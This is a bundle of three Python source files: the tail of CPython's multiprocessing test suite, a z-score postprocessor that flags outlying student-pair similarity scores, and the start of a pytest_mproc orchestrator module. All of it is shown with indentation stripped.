@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_poll_eintr(self):
got_signal = [False]
def record(*args):
got_signal[0] = True
pid = os.getpid()
oldhandler = signal.signal(signal.SIGUSR1, record)
try:
killer = self.Process(target=self._killer, args=(pid,))
killer.start()
try:
p = self.Process(target=time.sleep, args=(2,))
p.start()
p.join()
finally:
killer.join()
self.assertTrue(got_signal[0])
self.assertEqual(p.exitcode, 0)
finally:
signal.signal(signal.SIGUSR1, oldhandler)
#
# Test to verify handle verification, see issue 3321
#
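# Connection(44977608) wraps an arbitrary handle number that is almost
# certainly invalid; poll() must raise ValueError/OSError rather than crash.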
class TestInvalidHandle(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_handles(self):
conn = multiprocessing.connection.Connection(44977608)
# check that poll() doesn't crash
try:
conn.poll()
except (ValueError, OSError):
pass
finally:
# Hack private attribute _handle to avoid printing an error
# in conn.__del__
conn._handle = None
self.assertRaises((ValueError, OSError),
multiprocessing.connection.Connection, -1)
class OtherTest(unittest.TestCase):
# TODO: add more tests for deliver/answer challenge.
def test_deliver_challenge_auth_failure(self):
class _FakeConnection(object):
def recv_bytes(self, size):
return b'something bogus'
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.deliver_challenge,
_FakeConnection(), b'abc')
def test_answer_challenge_auth_failure(self):
class _FakeConnection(object):
def __init__(self):
self.count = 0
def recv_bytes(self, size):
self.count += 1
if self.count == 1:
return multiprocessing.connection.CHALLENGE
elif self.count == 2:
return b'something bogus'
return b''
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.answer_challenge,
_FakeConnection(), b'abc')
#
# Test Manager.start()/Pool.__init__() initializer feature - see issue 5585
#
def initializer(ns):
ns.test += 1
class TestInitializers(unittest.TestCase):
def setUp(self):
self.mgr = multiprocessing.Manager()
self.ns = self.mgr.Namespace()
self.ns.test = 0
def tearDown(self):
self.mgr.shutdown()
self.mgr.join()
def test_manager_initializer(self):
m = multiprocessing.managers.SyncManager()
self.assertRaises(TypeError, m.start, 1)
m.start(initializer, (self.ns,))
self.assertEqual(self.ns.test, 1)
m.shutdown()
m.join()
def test_pool_initializer(self):
self.assertRaises(TypeError, multiprocessing.Pool, initializer=1)
p = multiprocessing.Pool(1, initializer, (self.ns,))
p.close()
p.join()
self.assertEqual(self.ns.test, 1)
#
# Issue 5155, 5313, 5331: Test process in processes
# Verifies os.close(sys.stdin.fileno()) vs. sys.stdin.close() behavior
#
def _this_sub_process(q):
try:
item = q.get(block=False)
except pyqueue.Empty:
pass
def _test_process(q):
queue = multiprocessing.Queue()
subProc = multiprocessing.Process(target=_this_sub_process, args=(queue,))
subProc.daemon = True
subProc.start()
subProc.join()
def _afunc(x):
return x*x
def pool_in_process():
pool = multiprocessing.Pool(processes=4)
x = pool.map(_afunc, [1, 2, 3, 4, 5, 6, 7])
pool.close()
pool.join()
class _file_like(object):
def __init__(self, delegate):
self._delegate = delegate
self._pid = None
@property
def cache(self):
pid = os.getpid()
# There are no race conditions since fork keeps only the running thread
if pid != self._pid:
self._pid = pid
self._cache = []
return self._cache
def write(self, data):
self.cache.append(data)
def flush(self):
self._delegate.write(''.join(self.cache))
self._cache = []
class TestStdinBadfiledescriptor(unittest.TestCase):
def test_queue_in_process(self):
queue = multiprocessing.Queue()
proc = multiprocessing.Process(target=_test_process, args=(queue,))
proc.start()
proc.join()
def test_pool_in_process(self):
p = multiprocessing.Process(target=pool_in_process)
p.start()
p.join()
def test_flushing(self):
sio = io.StringIO()
flike = _file_like(sio)
flike.write('foo')
proc = multiprocessing.Process(target=lambda: flike.flush())
flike.flush()
        self.assertEqual(sio.getvalue(), 'foo')
class TestWait(unittest.TestCase):
@classmethod
def _child_test_wait(cls, w, slow):
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
w.send((i, os.getpid()))
w.close()
def test_wait(self, slow=False):
from multiprocessing.connection import wait
readers = []
procs = []
messages = []
for i in range(4):
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._child_test_wait, args=(w, slow))
p.daemon = True
p.start()
w.close()
readers.append(r)
procs.append(p)
self.addCleanup(p.join)
while readers:
for r in wait(readers):
try:
msg = r.recv()
except EOFError:
readers.remove(r)
r.close()
else:
messages.append(msg)
messages.sort()
expected = sorted((i, p.pid) for i in range(10) for p in procs)
self.assertEqual(messages, expected)
@classmethod
def _child_test_wait_socket(cls, address, slow):
s = socket.socket()
s.connect(address)
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
s.sendall(('%s\n' % i).encode('ascii'))
s.close()
def test_wait_socket(self, slow=False):
from multiprocessing.connection import wait
l = socket.socket()
l.bind((test.support.HOST, 0))
l.listen()
addr = l.getsockname()
readers = []
procs = []
dic = {}
for i in range(4):
p = multiprocessing.Process(target=self._child_test_wait_socket,
args=(addr, slow))
p.daemon = True
p.start()
procs.append(p)
self.addCleanup(p.join)
for i in range(4):
r, _ = l.accept()
readers.append(r)
dic[r] = []
l.close()
while readers:
for r in wait(readers):
msg = r.recv(32)
if not msg:
readers.remove(r)
r.close()
else:
dic[r].append(msg)
expected = ''.join('%s\n' % i for i in range(10)).encode('ascii')
for v in dic.values():
self.assertEqual(b''.join(v), expected)
def test_wait_slow(self):
self.test_wait(True)
def test_wait_socket_slow(self):
self.test_wait_socket(True)
def test_wait_timeout(self):
from multiprocessing.connection import wait
expected = 5
a, b = multiprocessing.Pipe()
start = time.time()
res = wait([a, b], expected)
delta = time.time() - start
self.assertEqual(res, [])
self.assertLess(delta, expected * 2)
self.assertGreater(delta, expected * 0.5)
b.send(None)
start = time.time()
res = wait([a, b], 20)
delta = time.time() - start
self.assertEqual(res, [a])
self.assertLess(delta, 0.4)
@classmethod
def signal_and_sleep(cls, sem, period):
sem.release()
time.sleep(period)
def test_wait_integer(self):
from multiprocessing.connection import wait
expected = 3
sorted_ = lambda l: sorted(l, key=lambda x: id(x))
sem = multiprocessing.Semaphore(0)
a, b = multiprocessing.Pipe()
p = multiprocessing.Process(target=self.signal_and_sleep,
args=(sem, expected))
p.start()
self.assertIsInstance(p.sentinel, int)
self.assertTrue(sem.acquire(timeout=20))
start = time.time()
res = wait([a, p.sentinel, b], expected + 20)
delta = time.time() - start
self.assertEqual(res, [p.sentinel])
self.assertLess(delta, expected + 2)
self.assertGreater(delta, expected - 2)
a.send(None)
start = time.time()
res = wait([a, p.sentinel, b], 20)
delta = time.time() - start
self.assertEqual(sorted_(res), sorted_([p.sentinel, b]))
self.assertLess(delta, 0.4)
b.send(None)
start = time.time()
res = wait([a, p.sentinel, b], 20)
delta = time.time() - start
self.assertEqual(sorted_(res), sorted_([a, p.sentinel, b]))
self.assertLess(delta, 0.4)
p.terminate()
p.join()
def test_neg_timeout(self):
from multiprocessing.connection import wait
a, b = multiprocessing.Pipe()
t = time.time()
res = wait([a], timeout=-1)
t = time.time() - t
self.assertEqual(res, [])
self.assertLess(t, 1)
a.close()
b.close()
#
# Issue 14151: Test invalid family on invalid environment
#
class TestInvalidFamily(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_family(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener(r'\\.\test')
@unittest.skipUnless(WIN32, "skipped on non-Windows platforms")
def test_invalid_family_win32(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener('/var/test.pipe')
#
# Issue 12098: check sys.flags of child matches that for parent
#
class TestFlags(unittest.TestCase):
@classmethod
def run_in_grandchild(cls, conn):
conn.send(tuple(sys.flags))
@classmethod
def run_in_child(cls):
import json
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=cls.run_in_grandchild, args=(w,))
p.start()
grandchild_flags = r.recv()
p.join()
r.close()
w.close()
flags = (tuple(sys.flags), grandchild_flags)
print(json.dumps(flags))
def test_flags(self):
import json, subprocess
# start child process using unusual flags
prog = ('from test._test_multiprocessing import TestFlags; ' +
'TestFlags.run_in_child()')
data = subprocess.check_output(
[sys.executable, '-E', '-S', '-O', '-c', prog])
child_flags, grandchild_flags = json.loads(data.decode('ascii'))
self.assertEqual(child_flags, grandchild_flags)
#
# Test interaction with socket timeouts - see Issue #6056
#
class TestTimeouts(unittest.TestCase):
@classmethod
def _test_timeout(cls, child, address):
time.sleep(1)
child.send(123)
child.close()
conn = multiprocessing.connection.Client(address)
conn.send(456)
conn.close()
def test_timeout(self):
old_timeout = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(0.1)
parent, child = multiprocessing.Pipe(duplex=True)
l = multiprocessing.connection.Listener(family='AF_INET')
p = multiprocessing.Process(target=self._test_timeout,
args=(child, l.address))
p.start()
child.close()
self.assertEqual(parent.recv(), 123)
parent.close()
conn = l.accept()
self.assertEqual(conn.recv(), 456)
conn.close()
l.close()
p.join(10)
finally:
socket.setdefaulttimeout(old_timeout)
#
# Test what happens with no "if __name__ == '__main__'"
#
class TestNoForkBomb(unittest.TestCase):
def test_noforkbomb(self):
sm = multiprocessing.get_start_method()
name = os.path.join(os.path.dirname(__file__), 'mp_fork_bomb.py')
if sm != 'fork':
rc, out, err = test.support.script_helper.assert_python_failure(name, sm)
self.assertEqual(out, b'')
self.assertIn(b'RuntimeError', err)
else:
rc, out, err = test.support.script_helper.assert_python_ok(name, sm)
self.assertEqual(out.rstrip(), b'123')
self.assertEqual(err, b'')
#
# Issue #17555: ForkAwareThreadLock
#
class TestForkAwareThreadLock(unittest.TestCase):
    # We recursively start processes. Issue #17555 meant that the
# after fork registry would get duplicate entries for the same
# lock. The size of the registry at generation n was ~2**n.
@classmethod
def child(cls, n, conn):
if n > 1:
p = multiprocessing.Process(target=cls.child, args=(n-1, conn))
p.start()
conn.close()
p.join(timeout=5)
else:
conn.send(len(util._afterfork_registry))
conn.close()
def test_lock(self):
r, w = multiprocessing.Pipe(False)
l = util.ForkAwareThreadLock()
old_size = len(util._afterfork_registry)
p = multiprocessing.Process(target=self.child, args=(5, w))
p.start()
w.close()
new_size = r.recv()
p.join(timeout=5)
self.assertLessEqual(new_size, old_size)
#
# Check that non-forked child processes do not inherit unneeded fds/handles
#
class TestCloseFds(unittest.TestCase):
def get_high_socket_fd(self):
if WIN32:
# The child process will not have any socket handles, so
# calling socket.fromfd() should produce WSAENOTSOCK even
# if there is a handle of the same number.
return socket.socket().detach()
else:
# We want to produce a socket with an fd high enough that a
# freshly created child process will not have any fds as high.
fd = socket.socket().detach()
to_close = []
while fd < 50:
to_close.append(fd)
fd = os.dup(fd)
for x in to_close:
os.close(x)
return fd
def close(self, fd):
if WIN32:
socket.socket(fileno=fd).close()
else:
os.close(fd)
@classmethod
def _test_closefds(cls, conn, fd):
try:
s = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
except Exception as e:
conn.send(e)
else:
s.close()
conn.send(None)
def test_closefd(self):
if not HAS_REDUCTION:
raise unittest.SkipTest('requires fd pickling')
reader, writer = multiprocessing.Pipe()
fd = self.get_high_socket_fd()
try:
p = multiprocessing.Process(target=self._test_closefds,
args=(writer, fd))
p.start()
writer.close()
e = reader.recv()
p.join(timeout=5)
finally:
self.close(fd)
writer.close()
reader.close()
if multiprocessing.get_start_method() == 'fork':
self.assertIs(e, None)
else:
WSAENOTSOCK = 10038
self.assertIsInstance(e, OSError)
self.assertTrue(e.errno == errno.EBADF or
e.winerror == WSAENOTSOCK, e)
#
# Issue #17097: EINTR should be ignored by recv(), send(), accept() etc
#
class TestIgnoreEINTR(unittest.TestCase):
@classmethod
def _test_ignore(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
conn.send('ready')
x = conn.recv()
conn.send(x)
conn.send_bytes(b'x'*(1024*1024)) # sending 1 MB should block
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
self.assertEqual(conn.recv(), 'ready')
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
conn.send(1234)
self.assertEqual(conn.recv(), 1234)
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
self.assertEqual(conn.recv_bytes(), b'x'*(1024*1024))
time.sleep(0.1)
p.join()
finally:
conn.close()
@classmethod
def _test_ignore_listener(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
with multiprocessing.connection.Listener() as l:
conn.send(l.address)
a = l.accept()
a.send('welcome')
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore_listener(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore_listener,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
address = conn.recv()
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
client = multiprocessing.connection.Client(address)
self.assertEqual(client.recv(), 'welcome')
p.join()
finally:
conn.close()
class TestStartMethod(unittest.TestCase):
@classmethod
def _check_context(cls, conn):
conn.send(multiprocessing.get_start_method())
def check_context(self, ctx):
r, w = ctx.Pipe(duplex=False)
p = ctx.Process(target=self._check_context, args=(w,))
p.start()
w.close()
child_method = r.recv()
r.close()
p.join()
self.assertEqual(child_method, ctx.get_start_method())
def test_context(self):
for method in ('fork', 'spawn', 'forkserver'):
try:
ctx = multiprocessing.get_context(method)
except ValueError:
continue
self.assertEqual(ctx.get_start_method(), method)
self.assertIs(ctx.get_context(), ctx)
self.assertRaises(ValueError, ctx.set_start_method, 'spawn')
self.assertRaises(ValueError, ctx.set_start_method, None)
self.check_context(ctx)
def test_set_get(self):
multiprocessing.set_forkserver_preload(PRELOAD)
count = 0
old_method = multiprocessing.get_start_method()
try:
for method in ('fork', 'spawn', 'forkserver'):
try:
multiprocessing.set_start_method(method, force=True)
except ValueError:
continue
self.assertEqual(multiprocessing.get_start_method(), method)
ctx = multiprocessing.get_context()
self.assertEqual(ctx.get_start_method(), method)
self.assertTrue(type(ctx).__name__.lower().startswith(method))
self.assertTrue(
ctx.Process.__name__.lower().startswith(method))
self.check_context(multiprocessing)
count += 1
finally:
multiprocessing.set_start_method(old_method, force=True)
self.assertGreaterEqual(count, 1)
def test_get_all(self):
methods = multiprocessing.get_all_start_methods()
if sys.platform == 'win32':
self.assertEqual(methods, ['spawn'])
else:
self.assertTrue(methods == ['fork', 'spawn'] or
methods == ['fork', 'spawn', 'forkserver'])
def test_preload_resources(self):
if multiprocessing.get_start_method() != 'forkserver':
self.skipTest("test only relevant for 'forkserver' method")
name = os.path.join(os.path.dirname(__file__), 'mp_preload.py')
rc, out, err = test.support.script_helper.assert_python_ok(name)
out = out.decode()
err = err.decode()
if out.rstrip() != 'ok' or err != '':
print(out)
print(err)
self.fail("failed spawning forkserver or grandchild")
#
# Check that killing process does not leak named semaphores
#
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
class TestSemaphoreTracker(unittest.TestCase):
def test_semaphore_tracker(self):
import subprocess
cmd = '''if 1:
import multiprocessing as mp, time, os
mp.set_start_method("spawn")
lock1 = mp.Lock()
lock2 = mp.Lock()
os.write(%d, lock1._semlock.name.encode("ascii") + b"\\n")
os.write(%d, lock2._semlock.name.encode("ascii") + b"\\n")
time.sleep(10)
'''
r, w = os.pipe()
p = subprocess.Popen([sys.executable,
'-c', cmd % (w, w)],
pass_fds=[w],
stderr=subprocess.PIPE)
os.close(w)
with open(r, 'rb', closefd=True) as f:
name1 = f.readline().rstrip().decode('ascii')
name2 = f.readline().rstrip().decode('ascii')
_multiprocessing.sem_unlink(name1)
p.terminate()
p.wait()
time.sleep(2.0)
with self.assertRaises(OSError) as ctx:
_multiprocessing.sem_unlink(name2)
# docs say it should be ENOENT, but OSX seems to give EINVAL
self.assertIn(ctx.exception.errno, (errno.ENOENT, errno.EINVAL))
err = p.stderr.read().decode('utf-8')
p.stderr.close()
expected = 'semaphore_tracker: There appear to be 2 leaked semaphores'
self.assertRegex(err, expected)
self.assertRegex(err, r'semaphore_tracker: %r: \[Errno' % name1)
class TestSimpleQueue(unittest.TestCase):
@classmethod
def _test_empty(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
# issue 30301, could fail under spawn and forkserver
try:
queue.put(queue.empty())
queue.put(queue.empty())
finally:
parent_can_continue.set()
def test_empty(self):
queue = multiprocessing.SimpleQueue()
child_can_start = multiprocessing.Event()
parent_can_continue = multiprocessing.Event()
proc = multiprocessing.Process(
target=self._test_empty,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertTrue(queue.empty())
child_can_start.set()
parent_can_continue.wait()
self.assertFalse(queue.empty())
self.assertEqual(queue.get(), True)
self.assertEqual(queue.get(), False)
self.assertTrue(queue.empty())
proc.join()
#
# Mixins
#
class ProcessesMixin(object):
TYPE = 'processes'
Process = multiprocessing.Process
connection = multiprocessing.connection
current_process = staticmethod(multiprocessing.current_process)
active_children = staticmethod(multiprocessing.active_children)
Pool = staticmethod(multiprocessing.Pool)
Pipe = staticmethod(multiprocessing.Pipe)
Queue = staticmethod(multiprocessing.Queue)
JoinableQueue = staticmethod(multiprocessing.JoinableQueue)
Lock = staticmethod(multiprocessing.Lock)
RLock = staticmethod(multiprocessing.RLock)
Semaphore = staticmethod(multiprocessing.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.BoundedSemaphore)
Condition = staticmethod(multiprocessing.Condition)
Event = staticmethod(multiprocessing.Event)
Barrier = staticmethod(multiprocessing.Barrier)
Value = staticmethod(multiprocessing.Value)
Array = staticmethod(multiprocessing.Array)
RawValue = staticmethod(multiprocessing.RawValue)
RawArray = staticmethod(multiprocessing.RawArray)
class ManagerMixin(object):
TYPE = 'manager'
Process = multiprocessing.Process
Queue = property(operator.attrgetter('manager.Queue'))
JoinableQueue = property(operator.attrgetter('manager.JoinableQueue'))
Lock = property(operator.attrgetter('manager.Lock'))
RLock = property(operator.attrgetter('manager.RLock'))
Semaphore = property(operator.attrgetter('manager.Semaphore'))
BoundedSemaphore = property(operator.attrgetter('manager.BoundedSemaphore'))
Condition = property(operator.attrgetter('manager.Condition'))
Event = property(operator.attrgetter('manager.Event'))
Barrier = property(operator.attrgetter('manager.Barrier'))
Value = property(operator.attrgetter('manager.Value'))
Array = property(operator.attrgetter('manager.Array'))
list = property(operator.attrgetter('manager.list'))
dict = property(operator.attrgetter('manager.dict'))
Namespace = property(operator.attrgetter('manager.Namespace'))
@classmethod
def Pool(cls, *args, **kwds):
return cls.manager.Pool(*args, **kwds)
@classmethod
def setUpClass(cls):
cls.manager = multiprocessing.Manager()
@classmethod
def tearDownClass(cls):
# only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395)
t = 0.01
while len(multiprocessing.active_children()) > 1 and t < 5:
time.sleep(t)
t *= 2
gc.collect() # do garbage collection
if cls.manager._number_of_objects() != 0:
# This is not really an error since some tests do not
# ensure that all processes which hold a reference to a
# managed object have been joined.
print('Shared objects which still exist at manager shutdown:')
print(cls.manager._debug_info())
cls.manager.shutdown()
cls.manager.join()
cls.manager = None
class ThreadsMixin(object):
TYPE = 'threads'
Process = multiprocessing.dummy.Process
connection = multiprocessing.dummy.connection
current_process = staticmethod(multiprocessing.dummy.current_process)
active_children = staticmethod(multiprocessing.dummy.active_children)
Pool = staticmethod(multiprocessing.dummy.Pool)
Pipe = staticmethod(multiprocessing.dummy.Pipe)
Queue = staticmethod(multiprocessing.dummy.Queue)
JoinableQueue = staticmethod(multiprocessing.dummy.JoinableQueue)
Lock = staticmethod(multiprocessing.dummy.Lock)
RLock = staticmethod(multiprocessing.dummy.RLock)
Semaphore = staticmethod(multiprocessing.dummy.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.dummy.BoundedSemaphore)
Condition = staticmethod(multiprocessing.dummy.Condition)
Event = staticmethod(multiprocessing.dummy.Event)
Barrier = staticmethod(multiprocessing.dummy.Barrier)
Value = staticmethod(multiprocessing.dummy.Value)
Array = staticmethod(multiprocessing.dummy.Array)
#
# Functions used to create test cases from the base ones in this module
#
def install_tests_in_module_dict(remote_globs, start_method):
__module__ = remote_globs['__name__']
local_globs = globals()
ALL_TYPES = {'processes', 'threads', 'manager'}
for name, base in local_globs.items():
if not isinstance(base, type):
continue
if issubclass(base, BaseTestCase):
if base is BaseTestCase:
continue
assert set(base.ALLOWED_TYPES) <= ALL_TYPES, base.ALLOWED_TYPES
for type_ in base.ALLOWED_TYPES:
newname = 'With' + type_.capitalize() + name[1:]
Mixin = local_globs[type_.capitalize() + 'Mixin']
class Temp(base, Mixin, unittest.TestCase):
pass
Temp.__name__ = Temp.__qualname__ = newname
Temp.__module__ = __module__
remote_globs[newname] = Temp
elif issubclass(base, unittest.TestCase):
class Temp(base, object):
pass
Temp.__name__ = Temp.__qualname__ = name
Temp.__module__ = __module__
remote_globs[name] = Temp
dangling = [None, None]
old_start_method = [None]
def setUpModule():
multiprocessing.set_forkserver_preload(PRELOAD)
multiprocessing.process._cleanup()
dangling[0] = multiprocessing.process._dangling.copy()
dangling[1] = threading._dangling.copy()
old_start_method[0] = multiprocessing.get_start_method(allow_none=True)
try:
multiprocessing.set_start_method(start_method, force=True)
except ValueError:
raise unittest.SkipTest(start_method +
' start method not supported')
if sys.platform.startswith("linux"):
try:
lock = multiprocessing.RLock()
except OSError:
raise unittest.SkipTest("OSError raises on RLock creation, "
"see issue 3111!")
check_enough_semaphores()
util.get_temp_dir() # creates temp directory
multiprocessing.get_logger().setLevel(LOG_LEVEL)
def tearDownModule():
multiprocessing.set_start_method(old_start_method[0], force=True)
# pause a bit so we don't get warning about dangling threads/processes
time.sleep(0.5)
multiprocessing.process._cleanup()
gc.collect()
tmp = set(multiprocessing.process._dangling) - set(dangling[0])
if tmp:
print('Dangling processes:', tmp, file=sys.stderr)
del tmp
tmp = set(threading._dangling) - set(dangling[1])
if tmp:
print('Dangling threads:', tmp, file=sys.stderr)
remote_globs['setUpModule'] = setUpModule
remote_globs['tearDownModule'] = tearDownModule
|
guassian.py
|
# Postprocesses pair results by calculating the mean/std. deviation and finding appropriate outliers.
# assignment args:
# - see processor/edit_distance.py
# - alternatively, just use a files list
# postprocessor args:
# - sourceSuffix (string) - Suffix used by the processor.
# - resultsSuffix (string) - Suffix used by the postprocessor.
# - deviation (number): the std. deviation of interest
# - minThreshold (number - optional): If the score is above/below (depending on "above") this value, always keep it
# - above (bool): Whether we keep all those above or below this deviation.
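# Illustrative example of the expected configuration (hypothetical values; the
# real values come from the job/assignment configuration, not from this file):
#   args = {"sourceSuffix": "_pairs.json", "resultsSuffix": "_gaussian.json", "above": True}
#   assignment.args = {"threshold": 2.0, "minThreshold": 0.9, "allowPartners": False, "files": ["main.py"]}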
import helpers.common as common
import helpers.io as io
from multiprocessing import Process
import math
# converts a JSON pair result into a Python object
def pairJSONToObject(json):
student1 = json["pair"][0]
student2 = json["pair"][1]
score = float(json["score"])
return common.PairResult(student1, student2, score)
# finds the mean of the data
def getMean(data):
total = 0.0
count = 0.0
for element in data:
total = total + element.score
count = count + 1.0
return total / count
# finds the std. deviation of the data
def getDeviation(data, mean):
totalDiff = 0.0
count = 0.0
for element in data:
totalDiff = totalDiff + (element.score - mean)**2.0
count = count + 1.0
normalized = totalDiff / count
return math.sqrt(normalized)
# gets the z-score of a data point
def zScore(score, mean, deviation):
return (score - mean) / deviation
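# Worked example (illustrative numbers): for scores [2.0, 4.0, 6.0] the mean is 4.0 and the
# population deviation is sqrt(((2-4)**2 + (4-4)**2 + (6-4)**2) / 3) ~= 1.633,
# so zScore(6.0, 4.0, 1.633) ~= 1.22.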
# filters out results that aren't suspicious
def filterData(data, mean, deviation, threshold, above, minThreshold):
results = []
for element in data:
z = zScore(element.score, mean, deviation)
if z <= threshold and not above:
results.append(element)
continue
if z >= threshold and above:
results.append(element)
continue
        if minThreshold is not None and element.score <= minThreshold and not above:
results.append(element)
continue
        if minThreshold is not None and element.score >= minThreshold and above:
results.append(element)
continue
return results
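# Continuing the worked example above: with threshold=1.0, above=True and no minThreshold,
# only the 6.0 score (z ~= 1.22) passes the filter; 2.0 and 4.0 are dropped.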
# creates clusters from the filtered data
def createClusters(data, filename, assignName, allowPartners, helpers):
clusters = []
for element in data:
cluster = common.Cluster(allowPartners, filename, element.score)
member1 = common.Member(element.pair[0], assignName, helpers)
member2 = common.Member(element.pair[1], assignName, helpers)
cluster.add(member1)
cluster.add(member2)
clusters.append(cluster)
return clusters
# runs an entry in parallel
def runEntry(filename, students, helpers, assignment, args, allowPartners):
# get the data
assignName = assignment.name
sourceSuffix = args["sourceSuffix"]
resultsSuffix = args["resultsSuffix"]
threshold = assignment.args["threshold"]
above = args["above"]
minThreshold = None
    if "minThreshold" in assignment.args:
minThreshold = assignment.args["minThreshold"]
safeFilename = common.makeFilenameSafe(filename) + sourceSuffix
filepath = helpers.getProcessedPath(assignName, safeFilename)
if filepath != None:
rawData = common.PairResults(assignName, safeFilename, helpers)
data = []
# convert into python objects
for pair in rawData.iterate():
data.append(pair)
# get the mean
mean = getMean(data)
# get the deviation
deviation = getDeviation(data, mean)
helpers.printf("{}/{}: mean {}, deviation {}\n".format(assignName, filename, mean, deviation))
# filter out data
filtered = filterData(data, mean, deviation, threshold, above, minThreshold)
# create the clusters
clusters = createClusters(filtered, filename, assignName, allowPartners, helpers)
# flush to disk
common.clustersToStandardJSON(clusters, assignName, common.makeFilenameSafe(filename) + resultsSuffix, helpers)
# all done!
helpers.printf("Finished '{}', with {} results!\n".format(assignName, len(clusters)))
# the main function
def run(students, assignments, args, helpers):
# threads to join later
threads = []
# for each assignment
for assignment in assignments:
# for each entry
assignName = assignment.name
allowPartners = assignment.args["allowPartners"]
# print progress
        helpers.printf("postprocessing '{}' in parallel...\n".format(assignName))
# allow entry lists and file lists
entries = []
        if "entries" in assignment.args:
entries = assignment.args["entries"]
else:
            if "files" in assignment.args:
entries = assignment.args["files"]
for entry in entries:
            # use the first source as the filename in the case of an entry
filename = entry
            if "entries" in assignment.args:
filename = entry["sources"][0]
# create the thread
t = Process(target=runEntry, args=(filename, students, helpers, assignment, args, allowPartners))
threads.append(t)
t.start()
# join all of the threads
for t in threads:
t.join()
# all done
return True
|
main.py
|
import resource
import socket
import sys
import time
from contextlib import suppress
from multiprocessing.managers import MakeProxyType
import _pytest.fixtures
from multiprocessing import JoinableQueue, Process, Queue
from multiprocessing.managers import SyncManager, RemoteError
from typing import List, Any, Optional, Tuple, Union, Dict
import pytest
from pytest_mproc import resource_utilization, find_free_port, AUTHKEY
from pytest_mproc.data import TestBatch, ResultTestStatus, ResultException, ResultExit, DEFAULT_PRIORITY, \
TestExecutionConstraint
from pytest_mproc.fixtures import Global, FixtureManager
from pytest_mproc.utils import BasicReporter
__all__ = ["Orchestrator"]
def _localhost():
try:
return socket.gethostbyname(socket.gethostname())
except Exception:
print(">>> Cannot get ip address of host. Return 127.0.0.1 (localhost)")
return "127.0.0.1"
# Create proxies for Queue types to be accessible from remote clients
# NOTE: the multiprocessing module has a quirk/bug where passing proxies to another separate client (e.g., on
# another machine) causes the proxy to be rebuilt with a random authkey on the other side. Unless
# we override the constructor to force an authkey value, we will hit AuthenticationError's
JoinableQueueProxyBase = MakeProxyType("JoinableQueueProxy", exposed=["put", "get", "task_done", "join", "close"])
QueueProxyBase = MakeProxyType("QueueProxy", exposed=["put", "get", "task_done", "join", "close"])
class JoinableQueueProxy(JoinableQueueProxyBase):
def __init__(self, token, serializer, manager=None,
authkey=None, exposed=None, incref=True, manager_owned=False):
super().__init__(token, serializer, manager, AUTHKEY, exposed, incref, manager_owned)
class QueueProxy(QueueProxyBase):
def __init__(self, token, serializer, manager=None,
authkey=None, exposed=None, incref=True, manager_owned=False):
super().__init__(token, serializer, manager, AUTHKEY, exposed, incref, manager_owned)
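# Server-side usage sketch for these proxy types (it mirrors the registration done in
# Orchestrator.__init__ below when is_serving_remotes is True; AUTHKEY is the shared
# secret imported from pytest_mproc):
#
#   SyncManager.register("JoinableQueueProxy", JoinableQueue, JoinableQueueProxy)
#   SyncManager.register("QueueProxy", Queue, QueueProxy)
#   manager = SyncManager(authkey=AUTHKEY)
#   manager.start()
#   test_q = manager.JoinableQueueProxy()   # proxies that remote clients can use
#   result_q = manager.QueueProxy()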
class Orchestrator:
"""
    Class that acts as the main point of orchestration.
"""
class Manager(FixtureManager):
class Value:
def __init__(self, val):
self._val = val
def value(self):
return self._val
def __init__(self, main: Optional["Orchestrator"] = None, addr: Optional[Tuple[str, int]] = None):
if not main:
# client
Orchestrator.Manager.register("register_client")
Orchestrator.Manager.register("count")
Orchestrator.Manager.register("finalize")
Orchestrator.Manager.register("JoinableQueueProxy")
else:
# server:
self._worker_count = 0
self._clients = []
self._orchestrator = main
self._finalized = False
Orchestrator.Manager.register("register_client", self._register_client)
Orchestrator.Manager.register("count", self._count)
Orchestrator.Manager.register("finalize", self._finalize)
Orchestrator.Manager.register("JoinableQueueProxy", JoinableQueue, JoinableQueueProxy)
addr = (main.host, main.port) if main else addr
super().__init__(addr=addr, as_main=main is not None)
def _register_client(self, client, count: int) -> Value:
if self._finalized:
raise Exception("Client registered after disconnect")
self._clients.append(client)
self._worker_count += count
client.start(self._orchestrator._test_q, self._orchestrator._result_q)
def _count(self):
self._finalized = True
return self.Value(self._worker_count)
def _finalize(self):
for client in self._clients:
client.join()
self._clients = []
def __init__(self, host: str = _localhost(), port = find_free_port(), is_serving_remotes: bool=False):
"""
        :param host: host address on which the orchestration manager listens
        :param port: port on which the orchestration manager listens
